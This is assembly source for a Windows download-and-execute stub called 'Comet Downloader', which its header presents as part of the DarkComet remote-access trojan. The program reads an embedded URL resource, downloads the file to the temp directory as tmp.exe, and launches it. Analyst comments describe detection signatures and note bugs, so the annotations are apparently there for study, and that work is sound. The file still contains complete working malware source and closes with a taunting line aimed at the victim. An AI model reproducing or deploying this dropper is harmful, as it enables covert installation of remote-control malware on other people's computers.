
;-----------------------------------;
;     Comet Downloader [FASM]      -;
; Author : DarkCoderSc             -;
; Mail : [email protected]  -;
;----------------------------------------------------------------------;
; Size = 2048o (2ko)                                                  -;
; Server Editor include it will read the resource %URL% in RT_RCDATA  -;
; This sample example will be used on DarkComet-RAT !                 -;
;----------------------------------------------------------------------;

; Output format: 32-bit Windows PE, GUI subsystem, subsystem version 4.0.
; A GUI-subsystem image is started without a console window.
Format PE GUI 4.0

; Execution begins at the 'start' label in the code section.
entry start  

; FASM Win32 ANSI header package; it supplies the invoke/library/import macros
; and the constants (NULL, RT_RCDATA, SW_SHOW) used below.
; The absolute path points at the author's local FASM 1.68 install.
include 'c:\FASMW168\include\win32a.inc'

;Var data section rw-------------------------------------
; Read/write data section: string constants, result slots for the resource
; API calls, and the buffers the entry point fills in.
section '.data' data readable writeable 

;Const Values--------------------
CMD_OPEN   db 'open',0          ; verb string handed to ShellExecute
filep      db 'tmp.exe',0       ; fixed file name appended to the temp directory
;Uninitialised values------------
handle     dd ?                 ; GetModuleHandle result; stored but not read again in the visible code
hRes       dd ?                 ; FindResource result
hReturn    dd ?                 ; LoadResource result
sRes       dd ?                 ; SizeofResource result (byte count of the resource)
pRes       dd ?                 ; LockResource result (pointer to the resource bytes)
Res        db ?                 ; not referenced in the visible code
SzBuf      dd ?                 ; not referenced in the visible code
;Server Editor Values------------
; Name of the RT_RCDATA resource that is looked up at run time. Per the file
; header, the "Server Editor" is what supplies this resource (the URL).
RC_STR0    db '%URL%',0
TmpDir     rb 256d              ; 256-byte buffer: receives the temp path, then 'tmp.exe' is appended
;--------------
; NOTE(review): only one byte is reserved at 'url', yet the entry point copies
; [sRes] bytes to this address, so any resource longer than one byte extends
; past this label into 'path' and whatever follows it in the section.
url        db ?
path       db ?                 ; not referenced in the visible code

;Code section--------------------------------------------
;Code section--------------------------------------------
section '.code' code readable executable

;Entry point---------------------------------------------
; Analyst summary of the visible behaviour, in order:
;   1. read the RT_RCDATA resource named '%URL%' from the running image,
;   2. build <temp directory> + 'tmp.exe',
;   3. delete any existing file at that path,
;   4. download the URL to that path with URLDownloadToFile,
;   5. launch the downloaded file with ShellExecute 'open',
;   6. exit.
; No return value is checked anywhere: every step runs even when an earlier
; one failed. For detection, the observable chain is a urlmon download that
; writes tmp.exe into the user's temp directory, followed at once by a
; ShellExecute of that same file from the same process.
start:
     invoke GetModuleHandle,0           ; handle of the current image; saved but unused below
     mov [handle],eax
     ;Server Settings n1---------------------------------
     ; The NULL module argument makes the resource calls search the process's
     ; own executable image.
     invoke FindResource,NULL,RC_STR0,RT_RCDATA
     mov [hRes],eax
     invoke LoadResource,NULL,[hRes]
     mov [hReturn],eax
     invoke SizeofResource,NULL,[hRes]
     mov [sRes],eax
     invoke LockResource,[hReturn]
     mov [pRes],eax
     ; Copy [sRes] resource bytes to 'url'. Nothing bounds the copy against
     ; the size reserved at 'url' (see the data section).
     ; NOTE(review): no terminating zero is written here; the later use of
     ; 'url' as a string presumably relies on the resource data or on the
     ; zero-filled section for termination - confirm.
     invoke movememory,url,[pRes],[sRes]
     invoke FreeResource,[hReturn]
     xor eax, eax                       ; eax is overwritten by the next call; this has no visible effect
     ;Finally call the download process------------------
     ; Both arguments are TmpDir: the first parameter of GetTempPathA is the
     ; buffer length, so it receives the buffer's address here rather than
     ; the 256 bytes actually reserved.
     invoke GetTempPath,TmpDir,TmpDir
     ;Create The Final Path------------------------------
     invoke strcat,TmpDir,filep         ; TmpDir = <temp directory> + 'tmp.exe' (lstrcat, no length check)
     ;Now Download---------------------------------------
     invoke DeleteFile,TmpDir           ; remove any earlier file at the drop path
     invoke URLDownloadToFile,0,url,TmpDir,0,NULL ; fetch 'url' to the drop path; no callback, result ignored
     invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW ; open the downloaded file with a visible window
exit:
     ; Label is not the target of any jump in the visible code; control
     ; simply falls through to it.
     invoke ExitProcess,0

;Import data section-------------------------------------
;Import data section-------------------------------------
; Static import table. For triage, the combination visible here -
; URLDownloadToFileA (urlmon) together with ShellExecuteA (shell32) plus the
; resource-reading and temp-path/delete functions from kernel32 - matches the
; download-and-execute flow of the entry point.
section '.idata' import data readable

;Dll names-------------------------------
library urlmon,'URLMON.DLL',\
        Shell32,'SHELL32.DLL',\
        Kernel32,'KERNEL32.DLL',\
        User32,'USER32.DLL'

; Used by the entry point for the download step.
import urlmon,\
       URLDownloadToFile,'URLDownloadToFileA'

; Used by the entry point to launch the downloaded file.
import Shell32,\
       ShellExecute,'ShellExecuteA'

; Local alias on the left, exported name on the right. 'movememory' and
; 'strcat' are the author's aliases for RtlMoveMemory and lstrcat.
; lstrcpy and ZeroMemory are imported but not called in the visible code.
import Kernel32,\
       GetModuleHandle,'GetModuleHandleA',\
       FindResource,'FindResourceA',\
       LoadResource,'LoadResource',\
       SizeofResource,'SizeofResource',\
       LockResource,'LockResource',\
       lstrcpy,'lstrcpy',\
       ExitProcess,'ExitProcess',\
       movememory,'RtlMoveMemory',\
       FreeResource,'FreeResource',\
       ZeroMemory,'RtlZeroMemory',\
       strcat,'lstrcat',\
       GetTempPath,'GetTempPathA',\
       DeleteFile,'DeleteFileA'

; MessageBox is imported but not called in the visible code.
import User32,\
       MessageBox,'MessageBoxA'
Welcome to your nightmare, bitch.